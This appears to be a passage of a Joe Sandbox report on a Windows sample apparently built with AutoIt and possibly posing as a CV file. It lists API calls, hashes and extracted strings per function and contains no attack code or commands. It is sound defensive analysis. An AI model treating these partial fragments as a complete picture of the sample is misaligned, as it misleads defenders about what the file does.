                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,003F5DEE,?,?,?,?,?,0038ED63), ref: 003C9A44
                                                                                        • TerminateThread.KERNEL32(?,000001F6,?,?,?,003F5DEE,?,?,?,?,?,0038ED63), ref: 003C9A51
                                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,003F5DEE,?,?,?,?,?,0038ED63), ref: 003C9A5E
                                                                                          • Part of subcall function 003C93D1: CloseHandle.KERNEL32(?,?,003C9A6B,?,?,?,003F5DEE,?,?,?,?,?,0038ED63), ref: 003C93DB
                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 003C9A71
                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,003F5DEE,?,?,?,?,?,0038ED63), ref: 003C9A78
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                        • String ID:
                                                                                        • API String ID: 3495660284-0
                                                                                        • Opcode ID: 755b26f2f7937a6863ae57220f962931ea617f9904cec60db2a0044325770a12
                                                                                        • Instruction ID: 7899ec817d0b152af260d413821af7298c98ace242372b862560fc876d6e1d40
                                                                                        • Opcode Fuzzy Hash: 755b26f2f7937a6863ae57220f962931ea617f9904cec60db2a0044325770a12
                                                                                        • Instruction Fuzzy Hash: 65F0BE36941201ABD3122BE4EE8CEAA3729FF88301F05007AF603A10A4CB749804DB54
                                                                                        APIs
                                                                                          • Part of subcall function 0039F4EA: std::exception::exception.LIBCMT ref: 0039F51E
                                                                                          • Part of subcall function 0039F4EA: __CxxThrowException@8.LIBCMT ref: 0039F533
                                                                                        • __swprintf.LIBCMT ref: 00381EA6
                                                                                        Strings
                                                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00381D49
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                        • API String ID: 2125237772-557222456
                                                                                        • Opcode ID: 9eb0db9f95282e1e1d5463f85c317caabe0dc807dc51911ceb16e61ca10e30d1
                                                                                        • Instruction ID: 5fe9c97a8b57ec35417b66df1194a95166a1abe477ce86df7afa06714158c6db
                                                                                        • Opcode Fuzzy Hash: 9eb0db9f95282e1e1d5463f85c317caabe0dc807dc51911ceb16e61ca10e30d1
                                                                                        • Instruction Fuzzy Hash: 7B919A711143059FCB26FF24C996C7EB7A8AF85700F0049ADF9969B2A1DB70ED05CB92
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 003DB006
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 003DB115
                                                                                        • VariantClear.OLEAUT32(?), ref: 003DB298
                                                                                          • Part of subcall function 003C9DC5: VariantInit.OLEAUT32(00000000), ref: 003C9E05
                                                                                          • Part of subcall function 003C9DC5: VariantCopy.OLEAUT32(?,?), ref: 003C9E0E
                                                                                          • Part of subcall function 003C9DC5: VariantClear.OLEAUT32(?), ref: 003C9E1A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                        • API String ID: 4237274167-1221869570
                                                                                        • Opcode ID: 32eaecae5dc7fc109daa6d19ba17af4e748f6a1282315e2050357864243616e4
                                                                                        • Instruction ID: fca00fc31015517e4f7600bc0812159ab207057232cb6d6af5b7136fd25cad0f
                                                                                        • Opcode Fuzzy Hash: 32eaecae5dc7fc109daa6d19ba17af4e748f6a1282315e2050357864243616e4
                                                                                        • Instruction Fuzzy Hash: 6E918C76608301DFCB12EF24D48195AF7F4AF89704F15486EF89A9B361DB31E905CB52
                                                                                        APIs
                                                                                          • Part of subcall function 0039C6F4: _wcscpy.LIBCMT ref: 0039C717
                                                                                        • _memset.LIBCMT ref: 003C5438
                                                                                        • GetMenuItemInfoW.USER32(?), ref: 003C5467
                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003C5513
                                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 003C553D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                        • String ID: 0
                                                                                        • API String ID: 4152858687-4108050209
                                                                                        • Opcode ID: 2169921973a97967c20cca6cc8868bc6e642b9940b41a381e98e791e73c6cee8
                                                                                        • Instruction ID: 31e99106b5a511ffa5bca084df5d84f5c35ff8eb526f5e858da05e403673aa18
                                                                                        • Opcode Fuzzy Hash: 2169921973a97967c20cca6cc8868bc6e642b9940b41a381e98e791e73c6cee8
                                                                                        • Instruction Fuzzy Hash: 8B51F4725047019BD716AF28C841F6BB7E8EF96360F05062EF896D7190DBA0EDC48B52
                                                                                        APIs
                                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 003C027B
                                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 003C02B1
                                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 003C02C2
                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 003C0344
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                        • String ID: DllGetClassObject
                                                                                        • API String ID: 753597075-1075368562
                                                                                        • Opcode ID: 04f7f7860e091579082fe0dd340bf70fa3aa29b254943743b444f30f32d2065b
                                                                                        • Instruction ID: 623b7b37dc689017970f0fd2528b779938d78c3640b4e6c5c0a756807bb869d9
                                                                                        • Opcode Fuzzy Hash: 04f7f7860e091579082fe0dd340bf70fa3aa29b254943743b444f30f32d2065b
                                                                                        • Instruction Fuzzy Hash: 78416E75604244EFDB0ACF94C884F9A7BB9EF44310F1480ADA909DF246D7B5DD44CBA0
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 003C5075
                                                                                        • GetMenuItemInfoW.USER32 ref: 003C5091
                                                                                        • DeleteMenu.USER32(00000004,00000007,00000000), ref: 003C50D7
                                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00441708,00000000), ref: 003C5120
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Delete$InfoItem_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 1173514356-4108050209
                                                                                        • Opcode ID: fe6a75e2a29256ac1323faf3642d444669e20cd1c1d39dee2ebd5138bbf1bb8b
                                                                                        • Instruction ID: 54e81c5c7e670cba6ecf28396a0e12b29069cf0f943ded4e6005bb8948ba2274
                                                                                        • Opcode Fuzzy Hash: fe6a75e2a29256ac1323faf3642d444669e20cd1c1d39dee2ebd5138bbf1bb8b
                                                                                        • Instruction Fuzzy Hash: 5341C331204701AFDB12DF24D888F6AB7E4AF85314F044A5EF855DB291D730EC44CB62
                                                                                        APIs
                                                                                        • CharLowerBuffW.USER32(?,?,?,?), ref: 003E0587
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharLower
                                                                                        • String ID: cdecl$none$stdcall$winapi
                                                                                        • API String ID: 2358735015-567219261
                                                                                        • Opcode ID: a14b2d25a1d0e6e183fd49de338b1c431cd0eab40a617af2e3407e207630692e
                                                                                        • Instruction ID: df4bd3333337564484a03bba50fb7cd60b23f5bd6a1c8148105361babe725b10
                                                                                        • Opcode Fuzzy Hash: a14b2d25a1d0e6e183fd49de338b1c431cd0eab40a617af2e3407e207630692e
                                                                                        • Instruction Fuzzy Hash: 36310430500256AFCF06EF64CD41AEEB3B4FF55314B00866AE426AB3D1DBB5E945CB90
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 003BB88E
                                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 003BB8A1
                                                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 003BB8D1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 3850602802-1403004172
                                                                                        • Opcode ID: f17fdd98e2643ab0c1dfd03dd7e6addbb2e0f08c4c695dd5613ed7d60eada37a
                                                                                        • Instruction ID: 9f79d4a38e68fada69fc2d665c3ae296742ac5f7afbb8baf8f22095161c2f292
                                                                                        • Opcode Fuzzy Hash: f17fdd98e2643ab0c1dfd03dd7e6addbb2e0f08c4c695dd5613ed7d60eada37a
                                                                                        • Instruction Fuzzy Hash: 1C21E475900208AFDB16ABA4D886DFEB77CDF45358B104529F111AA1E0DFB85D0A9760
                                                                                        APIs
                                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003D4401
                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003D4427
                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003D4457
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 003D449E
                                                                                          • Part of subcall function 003D5052: GetLastError.KERNEL32(?,?,003D43CC,00000000,00000000,00000001), ref: 003D5067
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                        • String ID:
                                                                                        • API String ID: 1951874230-3916222277
                                                                                        • Opcode ID: 0c7a833c74de0d6fcf82561ddbfe2eebe1ab0eb88857192711236f7b3c96dd91
                                                                                        • Instruction ID: d50d47d48335cce5b343a183c3a1a71b5f728a07e981dd70a5220736c227c424
                                                                                        • Opcode Fuzzy Hash: 0c7a833c74de0d6fcf82561ddbfe2eebe1ab0eb88857192711236f7b3c96dd91
                                                                                        • Instruction Fuzzy Hash: A02180B2500208BFE7129F95ED85EBFB6FCEB49748F10802BF505A7240DA748D499771
                                                                                        APIs
                                                                                          • Part of subcall function 0039D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0039D1BA
                                                                                          • Part of subcall function 0039D17C: GetStockObject.GDI32(00000011), ref: 0039D1CE
                                                                                          • Part of subcall function 0039D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0039D1D8
                                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 003E915C
                                                                                        • LoadLibraryW.KERNEL32(?), ref: 003E9163
                                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 003E9178
                                                                                        • DestroyWindow.USER32(?), ref: 003E9180
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                        • String ID: SysAnimate32
                                                                                        • API String ID: 4146253029-1011021900
                                                                                        • Opcode ID: 55e4e37c3f0886826cd50c4df1a9f035bf058cfce1895abd2a0fab17694b3800
                                                                                        • Instruction ID: f3540ad3b760283ae5e05dabf207e180257c943fde73b5607b99a9f9f4d2ca88
                                                                                        • Opcode Fuzzy Hash: 55e4e37c3f0886826cd50c4df1a9f035bf058cfce1895abd2a0fab17694b3800
                                                                                        • Instruction Fuzzy Hash: 8721BE71600296BBEF224E66DC84FFA37ADEB99364F11072AF910A61D0C776DC41A760
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 003C9588
                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003C95B9
                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 003C95CB
                                                                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 003C9605
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateHandle$FilePipe
                                                                                        • String ID: nul
                                                                                        • API String ID: 4209266947-2873401336
                                                                                        • Opcode ID: 55a8636e82a1b58c5925f93b142aeb0125a084f04de8a4f5cd9b26c0714207fc
                                                                                        • Instruction ID: cf4d742e42bb6d534bf3a003b5fb850e1f294752f9927be062bb75a8033229d7
                                                                                        • Opcode Fuzzy Hash: 55a8636e82a1b58c5925f93b142aeb0125a084f04de8a4f5cd9b26c0714207fc
                                                                                        • Instruction Fuzzy Hash: 19219270500205ABDB22AF65DC09F9A77F8AF46720F224A5EF8A1E72D0D770DD45CB10
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 003C9653
                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003C9683
                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 003C9694
                                                                                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 003C96CE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateHandle$FilePipe
                                                                                        • String ID: nul
                                                                                        • API String ID: 4209266947-2873401336
                                                                                        • Opcode ID: e189ad2fb91f3d39e0ff251ace2481dce42a53e82c0a145660a9b272e4315c8b
                                                                                        • Instruction ID: f02234b72276f2e75d30535ae7154ce416d6ae52ed8a547ee3bb8c0bea0127e4
                                                                                        • Opcode Fuzzy Hash: e189ad2fb91f3d39e0ff251ace2481dce42a53e82c0a145660a9b272e4315c8b
                                                                                        • Instruction Fuzzy Hash: B421B3716002059BDB219F698C08F9AB7ECAF44730F220A1EF8A1E72D0DB70DC65CB14
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 003CDB0A
                                                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 003CDB5E
                                                                                        • __swprintf.LIBCMT ref: 003CDB77
                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,0041DC00), ref: 003CDBB5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                                                        • String ID: %lu
                                                                                        • API String ID: 3164766367-685833217
                                                                                        • Opcode ID: 11adefefed875912dfb7ea453e1a6ad32d8503f0da2437339d1dbf626cc09cae
                                                                                        • Instruction ID: c505883a6d0501fb0cf75e29700b45f350c30070a8e11a36af127ac5084ec713
                                                                                        • Opcode Fuzzy Hash: 11adefefed875912dfb7ea453e1a6ad32d8503f0da2437339d1dbf626cc09cae
                                                                                        • Instruction Fuzzy Hash: AA216835A00208AFCB11EFA4CD85EEEB7B8EF49704B1140A9F509EB251DB71EE45CB65
                                                                                        APIs
                                                                                          • Part of subcall function 003BC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 003BC84A
                                                                                          • Part of subcall function 003BC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 003BC85D
                                                                                          • Part of subcall function 003BC82D: GetCurrentThreadId.KERNEL32 ref: 003BC864
                                                                                          • Part of subcall function 003BC82D: AttachThreadInput.USER32(00000000), ref: 003BC86B
                                                                                        • GetFocus.USER32 ref: 003BCA05
                                                                                          • Part of subcall function 003BC876: GetParent.USER32(?), ref: 003BC884
                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 003BCA4E
                                                                                        • EnumChildWindows.USER32(?,003BCAC4), ref: 003BCA76
                                                                                        • __swprintf.LIBCMT ref: 003BCA90
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                                        • String ID: %s%d
                                                                                        • API String ID: 3187004680-1110647743
                                                                                        • Opcode ID: aa90804b85211c0b6781a4b438bc0ea4a8ca4cb661d4351be4621e1b1b014b5d
                                                                                        • Instruction ID: 995b75e29aea8e284011670cf4b3c08c1c03b937ac10c79132c040f4ec6e8e91
                                                                                        • Opcode Fuzzy Hash: aa90804b85211c0b6781a4b438bc0ea4a8ca4cb661d4351be4621e1b1b014b5d
                                                                                        • Instruction Fuzzy Hash: 301184B59102057BCB12BFA0CD86FE9376DAF44718F005066FE08AE182DB749545DB74
                                                                                        APIs
                                                                                        • __lock.LIBCMT ref: 003A7AD8
                                                                                          • Part of subcall function 003A7CF4: __mtinitlocknum.LIBCMT ref: 003A7D06
                                                                                          • Part of subcall function 003A7CF4: EnterCriticalSection.KERNEL32(00000000,?,003A7ADD,0000000D), ref: 003A7D1F
                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 003A7AE5
                                                                                        • __lock.LIBCMT ref: 003A7AF9
                                                                                        • ___addlocaleref.LIBCMT ref: 003A7B17
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                        • String ID: `@
